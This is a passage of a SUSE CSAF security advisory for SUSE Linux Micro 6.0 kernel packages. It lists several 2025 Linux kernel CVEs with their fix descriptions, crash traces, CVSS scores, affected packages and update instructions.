0x17ffffc00000c1(locked|waiters|head|node=0|zone=2|lastcpupid=0x1fffff)\n page_type: f4(hugetlb)\n page dumped because: still mapped when deleted\n CPU: 1 UID: 0 PID: 395 Comm: hugetlb Not tainted 6.17.0-rc5-00044-g7aac71907bde-dirty #484 NONE\n Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 0.0.0 02/06/2015\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x4f/0x70\n filemap_unaccount_folio+0xc4/0x1c0\n __filemap_remove_folio+0x38/0x1c0\n filemap_remove_folio+0x41/0xd0\n remove_inode_hugepages+0x142/0x250\n hugetlbfs_fallocate+0x471/0x5a0\n vfs_fallocate+0x149/0x380\n\nHold folio lock before checking if the folio is mapped to avold race with\nmigration.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40006",
"url": "https://www.suse.com/security/cve/CVE-2025-40006"
},
{
"category": "external",
"summary": "SUSE Bug 1252342 for CVE-2025-40006",
"url": "https://bugzilla.suse.com/1252342"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40006"
},
{
"cve": "CVE-2025-40024",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40024"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvhost: Take a reference on the task in struct vhost_task.\n\nvhost_task_create() creates a task and keeps a reference to its\ntask_struct. That task may exit early via a signal and its task_struct\nwill be released.\nA pending vhost_task_wake() will then attempt to wake the task and\naccess a task_struct which is no longer there.\n\nAcquire a reference on the task_struct while creating the thread and\nrelease the reference while the struct vhost_task itself is removed.\nIf the task exits early due to a signal, then the vhost_task_wake() will\nstill access a valid task_struct. The wake is safe and will be skipped\nin this case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40024",
"url": "https://www.suse.com/security/cve/CVE-2025-40024"
},
{
"category": "external",
"summary": "SUSE Bug 1252686 for CVE-2025-40024",
"url": "https://bugzilla.suse.com/1252686"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40024"
},
{
"cve": "CVE-2025-40033",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40033"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nremoteproc: pru: Fix potential NULL pointer dereference in pru_rproc_set_ctable()\n\npru_rproc_set_ctable() accessed rproc-\u003epriv before the IS_ERR_OR_NULL\ncheck, which could lead to a null pointer dereference. Move the pru\nassignment, ensuring we never dereference a NULL rproc pointer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40033",
"url": "https://www.suse.com/security/cve/CVE-2025-40033"
},
{
"category": "external",
"summary": "SUSE Bug 1252824 for CVE-2025-40033",
"url": "https://bugzilla.suse.com/1252824"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40033"
},
{
"cve": "CVE-2025-40042",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40042"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix race condition in kprobe initialization causing NULL pointer dereference\n\nThere is a critical race condition in kprobe initialization that can lead to\nNULL pointer dereference and kernel crash.\n\n[1135630.084782] Unable to handle kernel paging request at virtual address 0000710a04630000\n...\n[1135630.260314] pstate: 404003c9 (nZcv DAIF +PAN -UAO)\n[1135630.269239] pc : kprobe_perf_func+0x30/0x260\n[1135630.277643] lr : kprobe_dispatcher+0x44/0x60\n[1135630.286041] sp : ffffaeff4977fa40\n[1135630.293441] x29: ffffaeff4977fa40 x28: ffffaf015340e400\n[1135630.302837] x27: 0000000000000000 x26: 0000000000000000\n[1135630.312257] x25: ffffaf029ed108a8 x24: ffffaf015340e528\n[1135630.321705] x23: ffffaeff4977fc50 x22: ffffaeff4977fc50\n[1135630.331154] x21: 0000000000000000 x20: ffffaeff4977fc50\n[1135630.340586] x19: ffffaf015340e400 x18: 0000000000000000\n[1135630.349985] x17: 0000000000000000 x16: 0000000000000000\n[1135630.359285] x15: 0000000000000000 x14: 0000000000000000\n[1135630.368445] x13: 0000000000000000 x12: 0000000000000000\n[1135630.377473] x11: 0000000000000000 x10: 0000000000000000\n[1135630.386411] x9 : 0000000000000000 x8 : 0000000000000000\n[1135630.395252] x7 : 0000000000000000 x6 : 0000000000000000\n[1135630.403963] x5 : 0000000000000000 x4 : 0000000000000000\n[1135630.412545] x3 : 0000710a04630000 x2 : 0000000000000006\n[1135630.421021] x1 : ffffaeff4977fc50 x0 : 0000710a04630000\n[1135630.429410] Call trace:\n[1135630.434828] kprobe_perf_func+0x30/0x260\n[1135630.441661] kprobe_dispatcher+0x44/0x60\n[1135630.448396] aggr_pre_handler+0x70/0xc8\n[1135630.454959] kprobe_breakpoint_handler+0x140/0x1e0\n[1135630.462435] brk_handler+0xbc/0xd8\n[1135630.468437] do_debug_exception+0x84/0x138\n[1135630.475074] el1_dbg+0x18/0x8c\n[1135630.480582] security_file_permission+0x0/0xd0\n[1135630.487426] vfs_write+0x70/0x1c0\n[1135630.493059] ksys_write+0x5c/0xc8\n[1135630.498638] __arm64_sys_write+0x24/0x30\n[1135630.504821] el0_svc_common+0x78/0x130\n[1135630.510838] el0_svc_handler+0x38/0x78\n[1135630.516834] el0_svc+0x8/0x1b0\n\nkernel/trace/trace_kprobe.c: 1308\n0xffff3df8995039ec \u003ckprobe_perf_func+0x2c\u003e: ldr x21, [x24,#120]\ninclude/linux/compiler.h: 294\n0xffff3df8995039f0 \u003ckprobe_perf_func+0x30\u003e: ldr x1, [x21,x0]\n\nkernel/trace/trace_kprobe.c\n1308: head = this_cpu_ptr(call-\u003eperf_events);\n1309: if (hlist_empty(head))\n1310: \treturn 0;\n\ncrash\u003e struct trace_event_call -o\nstruct trace_event_call {\n ...\n [120] struct hlist_head *perf_events; //(call-\u003eperf_event)\n ...\n}\n\ncrash\u003e struct trace_event_call ffffaf015340e528\nstruct trace_event_call {\n ...\n perf_events = 0xffff0ad5fa89f088, //this value is correct, but x21 = 0\n ...\n}\n\nRace Condition Analysis:\n\nThe race occurs between kprobe activation and perf_events initialization:\n\n CPU0 CPU1\n ==== ====\n perf_kprobe_init\n perf_trace_event_init\n tp_event-\u003eperf_events = list;(1)\n tp_event-\u003eclass-\u003ereg (2)\u003c- KPROBE ACTIVE\n Debug exception triggers\n ...\n kprobe_dispatcher\n kprobe_perf_func (tk-\u003etp.flags \u0026 TP_FLAG_PROFILE)\n head = this_cpu_ptr(call-\u003eperf_events)(3)\n (perf_events is still NULL)\n\nProblem:\n1. CPU0 executes (1) assigning tp_event-\u003eperf_events = list\n2. CPU0 executes (2) enabling kprobe functionality via class-\u003ereg()\n3. CPU1 triggers and reaches kprobe_dispatcher\n4. CPU1 checks TP_FLAG_PROFILE - condition passes (step 2 completed)\n5. CPU1 calls kprobe_perf_func() and crashes at (3) because\n call-\u003eperf_events is still NULL\n\nCPU1 sees that kprobe functionality is enabled but does not see that\nperf_events has been assigned.\n\nAdd pairing read an\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40042",
"url": "https://www.suse.com/security/cve/CVE-2025-40042"
},
{
"category": "external",
"summary": "SUSE Bug 1252861 for CVE-2025-40042",
"url": "https://bugzilla.suse.com/1252861"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40042"
},
{
"cve": "CVE-2025-40053",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40053"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dlink: handle copy_thresh allocation failure\n\nThe driver did not handle failure of `netdev_alloc_skb_ip_align()`.\nIf the allocation failed, dereferencing `skb-\u003eprotocol` could lead to\na NULL pointer dereference.\n\nThis patch tries to allocate `skb`. If the allocation fails, it falls\nback to the normal path.\n\nTested-on: D-Link DGE-550T Rev-A3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40053",
"url": "https://www.suse.com/security/cve/CVE-2025-40053"
},
{
"category": "external",
"summary": "SUSE Bug 1252808 for CVE-2025-40053",
"url": "https://bugzilla.suse.com/1252808"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40053"
},
{
"cve": "CVE-2025-40081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf: arm_spe: Prevent overflow in PERF_IDX2OFF()\n\nCast nr_pages to unsigned long to avoid overflow when handling large\nAUX buffer sizes (\u003e= 2 GiB).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40081",
"url": "https://www.suse.com/security/cve/CVE-2025-40081"
},
{
"category": "external",
"summary": "SUSE Bug 1252776 for CVE-2025-40081",
"url": "https://bugzilla.suse.com/1252776"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40081"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
